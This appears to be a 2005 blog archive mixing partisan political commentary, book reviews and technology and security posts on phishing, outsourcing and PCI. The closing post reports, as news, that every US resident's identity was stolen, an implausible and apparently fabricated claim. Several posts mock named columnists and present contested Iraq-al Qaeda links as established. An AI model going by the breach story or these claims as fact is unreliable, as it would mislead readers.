Thursday, June 30, 2005

Disintegration of the old-line newspaper business


Picture credit: http://www.newsday.com
Newspaper businessThe indispensible PoliPundit points us to one of many stories of circulation fraud plaguing the old-line newspaper business.

Put simply, the traditional newspaper business is disintegrating faster than a six dollar suit. Newsday, among others, reportedly engaged in a massive fabrication of sales numbers. The bogus circulation game is simple: pump up distribution to keep ad revenues flowing.

Furthermore, the questionable practices extend to a bevy of major dailies. And, even without questioning their circulation numbers, it looks like the big boys have been heavily subsidizing sales by offering discounts. The accompanying chart, also courtesy of Newsday, tells the discounting story.

Surprise, surprise - the list of the ten most discounted newspapers reads like a Who's Who of MSM/DNC shills. Here are the chart's top ten most heavily discounted papers... along with some of their noteworthy personalities:

  • Washington Post - Richard Cohen (or, as I like to call him, "The Goalpost Shifter")

  • Atlanta Journal-Constitution - Tom Teepen ("Dense and intellectually bankrupt is no way to go through life, son")

  • Boston Globe - Thomas Oliphant ("Nickname: The human 'factuum' - a consistent lack of any factual basis to his arguments")

  • San Francisco Chronicle - the city that only syndicates!

  • Houston Chronicle - Cragg Hines ("Puts the 'Cragg' in 'Craggpot!")

  • Los Angeles Times - Ron Brownstein ("The least-read columnist in the largest city in America!")

  • Philadelphia Inquirer - Trudy Rubin ("If there's a Pulitzer Prize for extruding DNC talking points like a Pez dispenser, she's a lock!")

  • New York Times - Maureen Dowd ("Chimpy McBushitler is responsible for all of America's troubles... and my whiney voice!")

  • Newark Star-Ledger - Deborah Jerome-Cohen ("We're evil, empire-building occupiers... with hearts of gold!")

  • Minneapolis Star Tribune - Nick Coleman ("Trying to control envy... trying... trying... failing... YOU POWERLINERS STINK LIKE... SICK... uhm... WEASELS!")


  • Keep up the great work, MSM/DNC op-ed columnists! From all appearances, you're accelerating the destruction of print media, almost singlehandedly. In this case, intellectual bankruptcy is beginning to translate to financial bankruptcy.

    Let's see. If I'm a publisher of one of these papers, what lessons can I learn from this? DNC shills... poor circulation. Hmmm. What can I learn? Constant recitation of DNC talking points equals crappy circulation. What... could... I... change if I'm publishing the paper? Hmmm. I'm not coming up with anything. Anyone? Bueller? Anyone?

    Wednesday, June 29, 2005

    Book Review: Lee Child's One Shot 


    Amazon - One Shot by Lee ChildLee Child's enigmatic drifter, Jack Reacher, is back and this time, he's really ticked off.

    A former Gulf War sniper is accused of a random killing spree in a small Indiana city. Hiding in a parking garage, someone killed six civilians during rush hour by picking them off, one at a time, in the city plaza. And a bevy of evidence supports the contention that the former sniper, James Barr, is the guilty party.

    Rousted out of bed in the middle of the night, Barr has only two things to say: "I'm innocent" and "Get Reacher". Having seen the crime and arrest reported on CNN, though, Reacher is already on the way. Using the classic Child formula of investigative and procedural detail, unbridled criminal brutality, and the thinking man's cold-hearted hero, One Shot is a trip on the express lane straight into the darkest corner of the heartlands.

    I'll be frank, this isn't Child's best novel. Not even close. Try Persuader, Running Blind or Without Fail for the penultimate Reacher stories. But Child's lesser efforts are so far above the typical "thriller" that the term seems woefully misplaced. Simply put, Child is the best action-adventure author in the business today. On my scorecard he's nine for nine. Read any of the Reacher novels, in any order, for a surefire adrenaline rush.
     

    I have seen the future of the newspaper...


    Picture credit: http://davidszondy.com
    Newspaper of the futureI have seen the future of the newspaper, and its name is NowPublic (hat tip: Scobleizer).

    Think Wikipedia as applied to the online newspaper business. Anyone can post a news story, picture, audio or video clip. Registered users edit and vote on stories. More votes will translate to increased visibility: major stories move higher on the page ("above the fold") based upon the votes they've received.

    Anyone can be a reporter, contributor, editor, or just a reader.

    Newspapers of all sizes better get on this concept, lickety-split, if they want to control the future of local news reporting.

    Now that I think about, someone could offer a software platform that would enable local entities to embrace this concept. Say, an open-source, PHP-based application that could provide all of the infrastructure necessary to run this type of operation. Wait a minute... wait... just... a minute... I've got a name:

    "OpenNewsDesk"

    That's gold, Jerry, gold!

    In fact, if Rob Curley gets there first, I wouldn't be surprised if LJworld.com implements it and starts offering it as a product.

    NowPublic

    The wonders of nature


    Picture credit: http://www.vegasretro.com
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueFrom the miscellaneous items department comes this headline from the Houston Chronicle:

    "Report can't pinpoint why tiger attacked Horn"

    Uhmmm, because it's a tiger?

    Houston Chronicle: Report can't pinpoint why tiger attacked Horn
     

    Tuesday, June 28, 2005

    Oh, those  dangers of outsourcing, part VI


    Picture credit: http://www.touchsupport.com/
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueIt's one of the first TCO (total cost of ownership) studies of outsourced help-desk support that I've seen. And if follows closely on the heels of various corporate moves to bring help-desk support back to the States:

    Management consultancy Compass conducted a global desktop study over four years to the end of 2004, and found that outsourcing can result in hidden costs through the increasing amount of self-support end users are forced to undertake...

    ...The study revealed self-support costs increase as more desktop support is outsourced, from £214 per user if 10 per cent of the desktop service is outsourced to £672 per user if 40 per cent of the service is outsourced...


    Silicon.com: Outsourcing can triple desktop support costs
     

    Ballmer: .NET is stalled


    Picture credit: http://www.techriots.com
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueI'm not sure exactly to what Microsoft's President is referring when he posits that .NET has been "stalled" for the last year. In corporate America, .NET seems to be making positive headway against J2EE-based solutions. It does seem, however, that in the SME and Internet hosting world, open-source and mixed-source solutions (e.g., Zend's PHP-based offerings) are dominating. And there's no reason that Microsoft, like Oracle and IBM before it, can't coexist with the increasingly popular LAMP stack.

    Think .NET web services with multi-platform front-ends, for instance. Some advantages come to mind: non-homogenous infrastructure, which has certain cost and security advantages; ability to leverage pieces of the LAMP stack; less vendor tie-in; reduced licensing costs; and so forth.

    Asked about the future of its .NET strategy, Ballmer admitted the platform "had stalled in the last 12 months". But there would be a renewed .NET push, he said, and this was "an assigned priority" for the government sector.

    "Government has really been pushing for stronger interoperability. We can't support open source but we can support interoperability," he said.


    News.com: Ballmer: We'll kick-start "stalled" .NET
     

    Monday, June 27, 2005

    Underhanded Code


    Picture credit: http://www.irasov.com
    Underhanded C ContestThe invaluable Bruce Schneier points us to an Underhanded C contest. The challenge: to create source code that looks innocent, yet provides a malicious capability. Some of the samples I've seen employ obfuscated buffer overflow attacks to launch their malevolent behaviors.

    Two thoughts ran through my head after reading this:

    1) What, if any, are the implications for the open-source community? Some closed-source advocates might point to this example as evidence of open-source insecurity ("...see, even with full transparency, it's possible to infect a distro..."). I personally don't buy that argument. After all, we're forced to trust that closed-source vendors thoroughly vet code and developers.

    Furthermore, last year's well-publicized anti-open-source polemic (EE Times: "Linux: unfit for national security") hasn't exactly swung opinion, at least from what I can tell.

    2) A previous missive on self-replicating code referenced Ken Thompson's classic ACM article: "Reflections on Trusting Trust." In it, he describes why compilers -- written in the language they compile -- can't be trusted. Why? Simply because someone could surreptitiously modify the compiler source to infect every piece of code it builds with a malicious payload. Imagine an underhanded modification to gcc  , for instance.

    The Underhanded C contest is a good idea. It forces us to carefully consider code contributions in this, the golden age of Marvel Comics open-source software development.
     

    Hussein's Iraq and Al Qaeda


    Picture credit: http://www.husseinandterror.com
    http://www.husseinandterror.comThanks to the National Review Online's Deroy Murdoch, here's a compendium of various ties between Hussein's Iraq and Al Qaeda. Andrew McCarthy also described these ties in a separate article. And, of course, no presentation is complete without mentioning Murdock's multimedia presentation entitled, "Hussein and Terror" (not for the faint of heart).

    In any event, these make for interesting reading when transformed into an easily readable list of activities:

    o After running an al-Qaeda training camp in Afghanistan, [Zarqawi] found his way to Baathist Baghdad, where he reportedly checked into Olympic Hospital, an elite facility run by the late Uday Hussein, son of the captured tyrant. Zarqawi is believed to have received medical treatment for a leg injury sustained while dodging American GIs who toppled the Taliban. He convalesced in Baghdad for some two months. Once he was back on his foot, Zarqawi then opened an Ansar al-Islam terrorist training camp in northern Iraq...

    o According to the Clinton Justice Department's spring 1998 indictment of bin Laden, "Al Qaeda reached an understanding with the government of Iraq that al Qaeda would not work against that government and that on particular projects, specifically including weapons development, al Qaeda would work cooperatively with the Government of Iraq."

    o In what the CIA nicknamed "Operation Dogmeat," two Iraqi students who lived in the Philippines tried to demolish U.S. Information Service headquarters in Manila. Iraqi diplomat Muwufak al Ani met with the bombers five times before the attack. His car even took them near their target on January 19, 1991. Their bomb exploded prematurely, killing Ahmed J. Ahmed, but his accomplice, Abdul Kadham Saad, survived and was whisked to a Manila hospital. Saad, carrying documents bearing two distinct identities, asked staffers to alert the Iraqi embassy, then recited its phone number.

    o Around this time, according to former high-level CIA counterterrorist Stanley Bedlington, Hussein paired Iraqi intelligence operatives with members of the Arab Liberation Front to execute attacks. "The Iraqis had given them all passports," he said, "but they were all in numerical sequence." These tell-tale passport numbers helped friendly governments nab these terror teams.

    o President George Herbert Walker Bush ignored information that Hussein "was offering state payment to terrorists," then-Senator Al Gore (D., Tennessee) declared on October 15, 1992. Gore also listed more than a dozen examples of Iraq-sponsored terrorism and said "an estimated 1,400 terrorists were operating openly out of Iraq."

    o "In 1992, elements of al Qaeda came to Baghdad and met with Saddam Hussein," Abu Aman Amaleeki, a 20-year veteran of Iraqi intelligence, said on ABC's Nightline on September 26, 2002. Speaking from a Kurdish prison, he added: "And among them was Ayman al Zawahiri," bin Laden's chief deputy. "I was present when Ayman al Zawahiri visited Baghdad."

    o Former Iraqi Intelligence Service (IIS) Deputy Director Faruq Hijazi, reports a reliable foreign spy agency, supplied blank Yemeni passports to al Qaeda in 1992.

    o Mohammed Salameh, a 1993 World Trade Center attacker, called Baghdad 46 times in the two months before bomb maker Abdul Rahman Yasin flew from Baghdad to New Jersey to join the plot. Salameh's June 1992 phone bill totaled $1,401, which prompted his disconnection for non-payment. After the blast — which killed six individuals and injured 1,042 — Yasin fled to Baghdad, where records and multiple press accounts show he received safe haven and Baathist cash.

    o Based on a 20-page IIS document discovered in Baghdad, the Defense Intelligence Agency reports that "Alleged conspirators employed by IIS are wanted in connection with the [June 25, 1996] Khobar Towers bombing and the assassination attempt in 1993 of former President Bush."

    o In an October 27, 2003 memo, Defense Undersecretary Douglas J. Feith explained Hussein's bonus pay for terrorists: "Iraq increased support to Palestinian groups after major terrorist attacks and...the change in Iraqi relations with al Qaeda after the [1998 east African] embassy bombings followed this pattern." A top Philippine terrorist also said Iraq's payments to the al Qaeda-tied Abu Sayyaf grew after successful assaults.

    o ABC News reported on January 14, 1999, that it "has learned that in December [1998] an Iraqi intelligence chief, named Faruq Hijazi, now Iraq's ambassador to Turkey, made a secret trip to Afghanistan to meet with bin Laden."

    o On January 5, 2000, Malaysian intelligence photographed September 11 hijacker Khalid al-Mihdhar being escorted through Kuala Lumpur's airport by VIP facilitator Ahmed Hikmat Shakir, an Iraqi recommended to Malaysian Airlines by Baghdad's embassy there. The pair soon were photographed again at al Qaeda's three-day planning summit for the October 2000 U.S.S. Cole and 9/11 attacks. Three separate documents recently unearthed in Iraq identify an Ahmed Hikmat Shakir as a lieutenant colonel in Uday Hussein's elite Saddam Fedayeen.

    o Ahmed Khalil Ibrahim Samir al Ani is the former Iraqi diplomat suspected of meeting September 11 ringleader Mohamed Atta in Prague on April 8, 2001, and possibly June 2, 2000, the day before Atta flew from Prague to Newark, New Jersey. Top secret Pentagon records cite a Czech intelligence report that al Ani "ordered the IIS finance officer to issue Atta funds from IIS financial holdings in the Prague office." During the summer of 2000, $99,455 was wired from financial institutions in the United Arab Emirates to Atta's Sun Trust bank account in Florida.


    Murdock: Hussein and Terror

    Update: SoCalPundit has an excellent set of resources that clarify the links between Hussein's Iraq and Al Qaeda.

    Sunday, June 26, 2005

    Iraq, WMDs, and al-Zarqawi: the Jordan Trial


    Picture credit: CNN
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueI haven't seen much coverage of a trial that's taking place in Jordan. Thirteen men affiliated with al Qaeda are accused of planning to detonate chemical weapons on instructions from Musab al-Zarqawi.

    "They sought to disperse poisonous gases which would have caused death, illnesses and blindness," Col. Najeh al-Azam testified. al-Azam is a chemical expert in Jordan's Security Services, which investigated the group and foiled the plot in April of 2004.

    Jordanian officials believe that if the attack been carried out, thousands of people would have perished.

    The Guardian elaborates:

    ...Islamic militants planned to detonate an explosion that would have sent a cloud of toxic chemicals across Jordan, causing death, blindness and sickness, a chemical expert testified in a military court Wednesday.

    ...The accused include al-Qaida's leader in Iraq, Abu-Musab Al-Zarqawi, and three other fugitives who are being tried in absentia...


    CNN discusses the links between the suspects and al-Zarqawi in more depth:

    Photo
    Azmi Jayyousi (CNN)

    Jordanian intelligence suspects Jayyousi returned from Iraq in January after a meeting with al-Zarqawi in which they allegedly plotted to hit the three targets in Amman.

    In a series of raids, the Jordanians said, they seized 20 tons of chemicals and numerous explosives. Also seized were three trucks equipped with specially modified plows, apparently designed to crash through security barricades.

    The first alleged target was the Jordanian intelligence headquarters. The alleged blast was intended to be a big one.

    "According to my experience as an explosives expert, the whole of the Intelligence Department will be destroyed, and nothing of it will remain, nor anything surrounding it," Jayyousi said.


    John at Powerline notes:

    ...after the fall of Afghanistan at the end of 2001, Zarqawi and other al Qaeda veterans made their way to Iraq, where, secure under the wing of Saddam Hussein, they plotted chemical weapons attacks on countries friendly to the U.S., as well as the murder (successfully carried out) of an American diplomat. And yet, to this day it remains an article of faith on the left that Saddam's Iraq was a kite-flyer's paradise with no connection to international terrorism, no relations with al Qaeda, and, of course, no chemical weapons. Maybe the current trial will reveal where the chemicals assembled for the attack on Jordan came from; maybe it won't. But we don't need any new information to understand that Saddam's regime protected and supported the deadliest of al Qaeda's terrorists.


    And how do we know Zarqawi ended up in Iraq after the fall of Afghanistan? From numerous reports, including those published by the traditional neocon press outlets including the New York Times and al Jazeera:

    According to Jordanian court documents, after the U.S. invasion of Afghanistan, Zarqawi left for Iraq via Iran, eventually settling in the corner of northern Iraq controlled by Ansar al-Islam.[79]

    The next known sighting of Zarqawi came from Jordanian officials, who claim that they spotted Zarqawi on Sept. 9, 2002, when he illegally entered Jordan from Syria.[80]

    A month later, senior American diplomat, Laurence Foley, was murdered outside his home in Amman. Jordanian agents arrested three men involved in the killing who claimed that they had been recruited, armed, and paid by Zarqawi. He was sentenced to death in absentia. Court documents claim that Zarqawi planned and financed the operation during his stay in Iraq.[81]


    So, just to recap, a major terrorist leader affiliated with Al Qaeda used Iraq as a base of operations prior to the U.S. invasion. Not only did he orchestrate the murder of a senior American diplomat, but he was knee-deep in a WMD-attack designed to kill thousands.

    No, there's no story here. Just go about your business.

    PowerLine: Pay No Attention to the Terrorists Behind the Curtain
     

    Parliament of Obstructionists


    Picture credit: http://www.willisms.com
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueIn other words: the Democratic party circa 2005. Michelle Malkin points us to WILLisms' all-too-revealing summary of senior Democratic officials' rhetoric. I laughed. I cried. It moved me to post this entry. Here's a taste, but read the whole thing:

    When [Nancy "Majority Insurance" Pelosi was] queried on her plan for saving Social Security, [she] offered this eye-opening comment:

    "...why should we put a plan in? We will go — our plan is to stop him from — stop him. He must be stopped."


    Yes, the Democratic party... ensuring its minority status for years to come.

    WILLisms: Rabid Donkeys On The Loose
     

    Saturday, June 25, 2005

    The Hub of Digital Media Convergence: Lawrence, Kansas


    Picture credit: http://www.robcurley.com
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueIt's true, Virginia. Lawrence, Kansas is the hub of digital media convergence. Why? Because it's home to Rob Curley, the Lawrence-Journal World's director of New Media. Arguably the most visionary convergence journalist in the world, Curley has orchestrated the construction of:

    The Lawrence-Journal World - the newspaper's online presence, winner of the 2004 Edgie award for best overall news site (under 75,000 population), another award for most innovative visitor participation, and an EPpy Award for the Best Internet News Service.

    Lawrence.com - a gen-Y entertainment site, which has won both an Edgie award for best entertainment site and an Eppy award for best overall design.

    KUsports.com - the Kansas University sports site, which has won Edgie awards for best sports site and most innovative use of digital media.

    Curley's tenet is to ignore national news, because he doesn't want to compete with CNN. Instead he provides an unbelievable level of local detail - at one point even covering age 9 to 12 sports like T-ball as if it were the major leagues. Boxscores, interviews, pictures of the fields.... one little kid even had a classic quote during an online interview: "I'm really seeing the ball well now... I'm in a groove".

    To give you a sense of Curley (and his team's) creativity, consider the following KUsports features:

    Weather - a game-time weather mapper that modifies the conventional local weather maps to add local landmarks ("...the wind's blowing straight past Joe's Pizza into the stadium...")

    Simulations - Curley's team simulated the entire Kansas football schedule using an X-Box, created broadcasts of the simulated games, and even generated a complete database of online stats (Curley: "...and just like in real life, our virtual kicker sucks...").

    Statistics - the team hired an intern to enter the boxscore of every Kansas game since the 19th century into a complete, searchable database.

    Want to hear from the visionary himself? Take the time to listen to this highly entertaining interview with Curley. Then visit his blog from time to time. Creativity and a laser-like focus on the business are rare traits in a single person.
     

    Friday, June 24, 2005

    The Google AdSense Mystery: Revisited


    Picture credit: http://www.google.fr
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueI have some questions regarding my AdSense reports. Whoa, let me back up a bit. I use Google AdSense, primarily to familiarize myself with context-sensitive ad networks. I place AdSense text ads on my blog, a discussion board, and a newsletter that gets sent out from time to time. Check this report out of advertising performance over the last few months:

    Date rangePage ViewsClicksRevenue
    Dec 1 - Dec 22, 2004282,50483$23.73
    Jan 1 - Jan 22, 2005328,126131$32.48
    Feb 1 - Feb 22, 2005318,90880$12.95
    Mar 1 - Mar 22, 2005379,831474$63.81
    Apr 1 - Apr 22, 2005280,116544$60.10
    May 1 - May 22, 2005281,606454$55.48
    June 1 - June 22, 2005228,743307$36.94


    Okay, so here are my questions:

    1) What in the name of Rowdy Roddy Piper caused the "click-through explosion" between 2/05 and 3/05?
    2) What in the heck happened to my traffic in June?
    3) And what ever happened to Marie Osmond?

    In all seriousness, I really wonder about #1. Were my astounding improvements in click-through typical for most Google AdSense outlets? If so, it's no wonder Google had breakout earnings last quarter.

    And is my drop-off in click-through percentage typical for the Google network? And, if so, what are the implications for Google's results this quarter?
     

    Scotus: Property Rights


    Picture credit: http://www.getusout.org
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueThe Supreme Court decision known as Kelo, which is concerned with the seizure of private property for the public good, has raised the veritable firestorm of controversy. Argue with Signs has an extensive collection of reactions from the blogosphere:

    The Supreme Court has ruled that cities can seize homes through eminent domain for lame purposes such as “economic development.” ...

    Bryan Costin: So now, apparently, the only justification the government needs to take away your house and land is that the government wants more money. Have you ever met a government that didn’t want more money? Me neither.

    Dan Melson: This is about fat wallets, yes, but it isn’t intrinsically and unavoidably linked solely to fat wallets. Below that, more importantly, is the ability to move things politically. Once the public taking of property depends upon who has the loudest political voice, no one is safe. Down this path lies madness. Stark raving insanity.


    Putting the decision in context, John at Powerline notes:

    ...a Minneapolis suburb condemned a stretch along the metropolitan area's major beltway to serve as the new headquarters for Best Buy Company. This was prime real estate, which was already occupied by other profitable businesses--a major car dealer, restaurants, etc. They resisted the taking, but it was upheld.

    My point is not that these decisions were correct--I have considerable sympathy for the other side--but rather that the Kelo decision shouldn't come as a shock to anyone who has been following this area of the law...


    Argue with Signs: Scotus: Property Rights
     

    Kennedy vs. Rumsfeld


    Picture credit: http://one38.org
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueThere's just something fundamentally disturbing about this transcript of SecDef Rumsfeld's appearance before the Senate. It's not just the corrosive tongue-lashing from Senator Kennedy. And it's not the 55-gallon drum of vitriol or the pandemic talking points (soon to appear in an Al-Jazeera  op-ed piece). It also appears to me as a blatant hip-check of Durbin stage left. Radioblogger sums up the transcript in concise fashion:

    What is truly amazing about Kennedy's rant is what the alternative, [Kennedy]-controlled universe would be today.

    Saddam Hussein would still be in power, he would still be bribing his way out of the U.S. sanctions, and he would be continuing to reconstitute his WMD program, with the full intent on being a regional, if not global, threat. He would still be writing checks to families of Palestinian suicide bombers in Israel. His sons would still be literally raping and pillaging the landscape. Graves would still be filled, people would still be persecuted. Libya would not have turned over weapons information, and Syria would still run Lebanon. But I guess to Ted Kennedy, the world would be a much better place.


    RadioBlogger: Kennedy vs. Rumsfeld
     

    Thursday, June 23, 2005

    Book Review: MoneyBall



    MoneyBallI just posted the following review on Amazon:

    You need not be a baseball fan to appreciate Michael Lewis' MoneyBall. Lewis tracks Oakland A's GM Billy Beane, who built a series of powerhouse ballclubs with a major handicap. Despite having a payroll that was petty cash to teams like the Yankees, Beane's clubs excelled. A series of excellent finishes, culminating with a playoff series that took the Yankees to the limit, solidified Beane's reputation. But how did he do it?

    Beane's unconventional methods were the key. Using Bill James (of Baseball Abstract fame) as an inspiration, the A's GM hired the best and brightest statisticians and dispensed with the conventional wisdom of opinionated scouts. So what if a college catcher had a "bad baseball body"? Beane didn't care. He was concerned with metrics like on-base-percentage, which turns out to be a much better predictor of major league success than any scout.

    Dealing with players as business units, each with measurable ROI (return on investment), Beane bought low and sold high. If a closer cranked out a bunch of saves, Beane figured he could trade him for higher value than he was really worth. Saves were a misleading statistic: strikeouts, walks, and home-runs-allowed were the only true ways to measure a pitcher's performance. A "superstar" was simply a stat-generating machine and if the same amount of money could be leveraged on someone else that could yield similar stats, why not make a trade?

    In retrospect -- and like all great ideas -- Beane's tenets are remarkably simple. It's just interesting that it took baseball over a century to figure out that stats such as ERA and RBI are pretty much meaningless. What matter are stats that historically prove to be predictors of baseball victories: on-base-average and slugging average for batters, for instance. A quick, fascinating read, MoneyBall is an elegant look at a smart GM and his godfather: Bill James.
     

    Oh, those  dangers of outsourcing, part V


    Picture credit: Online Sun
    Online SunHave a seat. Please. Ready for yet another identity theft debacle? Here's another assault vector: outsourcing, which we also discussed in May.

    Following closely on the heels of the Indian call center fraud scandal, the Pakistan telecomm strike, the Bangalore bomb scares at Wipro and Infosys, and various terrorist threats, the offshored backoffice is a dangerous place. And I don't mean just for the workers, but for citizens abroad whose data is handled by firms with questionable vetting practices.

    The Sun reports:

    Crooked call centre workers in India are flogging details of Britons’ bank accounts, a Sun probe has found. Our undercover reporter was sold the top secret information on a thousand accounts, and numbers of passports and credit cards.

    An undercover reporter was able to buy the details thousands of UK banking accounts, password particulars and credit cards numbers from crooked call centre workers in India...


    The article isn't online yet, but The Register picks up the story:

    The paper says one of its journalists bought details of 1,000 UK banking customers from an IT worker in Delhi for £4.25 each. He was also able to buy the numbers of credit cards and account passwords. An unnamed security expert hired by the paper verified that the details were genuine. The information sold could be readily exploited by ID thieves to apply for credit cards or loans under assumed identities or to simply loot compromised accounts. The call centre worker bragged that he could sell up to 200,000 account details each month.

    The Sun handed over a dossier on its investigation to the City of London Police. In a statement, the City of London Police said: "Unfortunately we have no jurisdiction to prosecute this in the UK. However we have passed information through Interpol to the Indian authorities and will be working with them to secure the prosecution of this individual.".

    Amicus, the union, said the case highlighted possible data protection risks about moving financial services overseas. "Companies that have offshore jobs need to reflect on their decision and the assumption that cost savings benefiting them and their shareholders outweigh consumer confidentiality and confidence," Dave Fleming, senior finance officer, told the BBC.


    For those firms utilizing offshore resources to handle consumer identity data, an alarm claxon just went off. Again.

    Update: The eminent Bruce Schneier takes exception with this general viewpoint in his latest post. In a nutshell, his take is that the problem is with people, not offshore/onshore. But a commenter notes differences between the legal framework between countries that can make pursuing remedies noticably different.

    And here's another difference. In the U.S., there are accepted standards for employment. A typical call-center worker will be vetted through a standardized background-check process, a drug-screen, and so forth.

    Can a firm that offshores consumer data describe the vetting processes of their offshore firm? And the reliability of those doing the vetting?

    IMO, it is far riskier to pipe sensitive and valuable data offshore than it is to keep it onshore, all other factors being equal.
     

    Security as competitive advantage


    Picture credit: http://www.cumberlandgroup.com
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueInteresting snippet from a roundup of the recent spate of identity theft debacles (i.e., CardSystems, Bank of America, Lexis-Nexis, Harvard, ChoicePoint, Cal-Berkeley... *yawn*... *hrnggh*... sorry, dozed off there):

    ...A May 2005 survey of 8,200 consumers conducted by Lightspeed Research showed that over 80 percent of respondents felt threatened by online identity theft and online fraud.

    The survey also indicated that 80 percent of respondents would have more trust in their account provider -- and greater confidence in transacting online -- if their provider offered a hardware-based strong authentication solution.

    In addition, 44.5 percent of those surveyed said they would be more likely to switch account providers if a competitor offered hardware-based two-factor authenticators...


    I'll take the latter two assertions with a grain of salt. I'd be shocked if 40% of respondents could even define "strong authentication" or "two-factor". But I believe the first contention: people feel increasingly threatened by the tide of cyber-crime washing over the Internet.

    So what happens next? Yep, you guessed it! Prepare yourself for a spanking new marketing blitz by companies hoping to pitch identity tracking solutions for consumers. Coffee mugs... tee shirts... USB key fobs... towels (oops, just ignore that Holiday Inn towel I'm drying off with)...

    ...Take the new product launched by credit information management company Intersections. Called Privacy Protect, the service will keep tabs on credit information as well as public information like DMV, criminal, and mortgage and real estate records. In addition to tracking a person's credit information, such as who makes queries against it, it tracks how other unique information, which can be used for fraudulent activities, is accessed...


    Opportunistic, eh? The offering appears to be, in essence, a credit data aggregator with timely alerts.

    ...For a subscription fee, the service will aggregate and track not only a person's credit information but other unique forms of information that can be used for fraudulent activities... If new applications are made in the customer's name, or address changes at banks, the service alerts go out, for example. In essense, the service monitors publicly-available information that many companies use today to run background checks on prospective employees or customers. After all, if businesses can access your data, then why can't you track how they track it? ...


    Seems like a reasonable idea. Especially if the following Gartner estimate has any validity at all:

    ...According to Gartner (Quote, Chart), 9.4 million online U.S. adults were victimized by identity theft between April 2003 and April 2004. The losses amounted to $11.7 billion...


    Wow. ID theft is as common as halitosis at a garlic growers' convention.

    So, where's the business opportunity? It's a quality and differentiation issue, in my opinion.

    Companies that can demonstrate compliance to standards will likely have a competitive advantage. If your firm handles credit-cards and meets PCI, why not emblazon that fact on your marketing material?

    Slap the PCI-certified logo on your web site and stationary. Actually, I really don't know if there is a "PCI-certified" logo. But if there isn't there should be. While PCI is certainly no panacea (as Bruce Schneier has already pointed out), I'll bet CardSystems wishes they'd implemented it 100%.

    ...The standard, called the Payment Card Industry Data Security Standard, or PCI, consists of 12 requirements (PDF), such as installing a firewall and anti-virus software and regularly updating virus definitions. It also requires companies to encrypt data, to restrict data access to people who need it and to assign a unique identifying number to people with access rights in order to monitor who views and downloads data...


    PCI is a good start if only because firms can use it to their competitive advantage. You can bet the major merchants and the credit-card companies will be asking the PCI question of their processors.

    The next step? Any firm that handles or accepts sensitive consumer data should voluntarily adopt the principles of PCI on its own. And, hopefully, new and more comprehensive standards will be in place as part of a regulatory framework designed to force companies to better protect identity data.

    InternetNews: Fronting a Fix on Data Breaches
     

    Wednesday, June 22, 2005

    Phishing Variants: Popups and Visual Spoofing


    Picture credit: http://www.cbc.ca
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueIf you're at all concerned about the rampant epidemic of phishing emails sweeping the Internet, here are a couple of additional approaches to be aware of:

    Popup scams: News.com (and the usual security sites) are reporting that most current browsers are susceptible to popup scams. That is, a malicious site uses Javascript to pop-up a window in front of a legitimate web site (say, bankofamerica.com). The pop-up appears to be linked to the legitimate site and challenges the user for credentials (or other sensitive data). A typical user might assume the popup to be legit, since it appears over the backdrop of the real site. Rest assured, it's not: it's a scam. Real sites will authenticate you on the secure page itself.

    Visual spoofing: Netcraft reported this scam a year or so ago and it's still something to consider. The basic visual spoof uses Javascript to launch a new browser window without the traditional scroll-bars, menus, toolbars, etc. (the classic example of this is a popup ad banner). The spoof uses images to replace the traditional browser, such that the address bar, navigation buttons, "secure page" lock, and so forth all appear normally as they would on a secure page. Skeptical and want to see an example? Don Park has a good demo of visual spoofing here.

    The bad guys are more diabolical than Macgyver on a Starbucks bender. Always be suspicious.
     

    The Wikitorial Experiment


    Picture credit: http://aphgcaen.free.fr
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueThe LA Times has called a halt to its commendable Wikitorial experiment. The groundbreaking attempt at an interactive, user-edited op-ed piece was defaced repeatedly with obscene photos, according to the New York Times.

    Imagine an editorial that anyone can read and modify -- along the lines of the outstanding Wikipedia online encyclopedia -- and you pretty much have the general idea.

    Of course, with that sort of openness comes a certain level of risk, as the Times discovered:

    ...During most of Friday and Saturday, readers thoughtfully altered the editorial. By Friday afternoon, hundreds had weighed in. Some did add profanity but just as quickly a Web master from the paper took it down.

    "Nothing bad happened really until after midnight on Saturday," said Michael Newman, deputy editorial page editor...


    This is an idea that deserves some refinement and a few more chances. Here are some tactical suggestions for the folks who could back another pass at Wikitorials:

  • Force contributor registration - many newspapers already require that users open a free account. Force Wikitorial editors to open an account. If the user's account ends up abusing the Wikitorial, lock the account out. Since the account registration process takes upwards of a minute or so, editors can make it somewhat painful to deface content. In addition, allow users to rate other users.

  • Ban images - simply don't allow images to be posted or linked. That gets rid of the obscene image issue.

  • Solicit trusted editors - just as Wikipedia relies upon trusted contributors, use the rating system described above to create and nurture a community of trusted editors. Then let the editors worry about cleaning up the content and banning abusive users. It works for Wikipedia... and it can work for Wikitorials.

  • I commend the Times for their experiment. While I usually disagree (vehemently) with much of their op-ed content, this is an idea with stunning potential. Here's hoping they continue to work out the kinks and allow a new idea to germinate.

    N.Y. Times: Postings of Obscene Photos End Free-Form Editorial Experiment
     

    Tuesday, June 21, 2005

    Largest Security Breach Ever Revealed: 295 million identities stolen!


    Picture credit: http://www.howstuffworks.com
    Excel web sharing - spreadsheet collaboration over the Internet made easy with BadBlueThe largest case of identity theft in United States history was reported late yesterday. A conglomerate of large retailers revealed that their wide-ranging consumer databases had been compromised and that all 295,734,134 residents of the United States have had their identities stolen.

    Conglomerate security coordinator Rich Batch stated, "We are still in the process of discovering the nature of the security breach and adding protective measures to prevent this sort of thing from ever occurring again. However, our investigators have discovered that the records of nearly three hundred million U.S. residents have been copied from our systems to external parties."

    Batch went on to describe the fact that social-security numbers, names, addresses, dates-of-birth, credit scores, and a variety of other sensitive fields had been stolen.

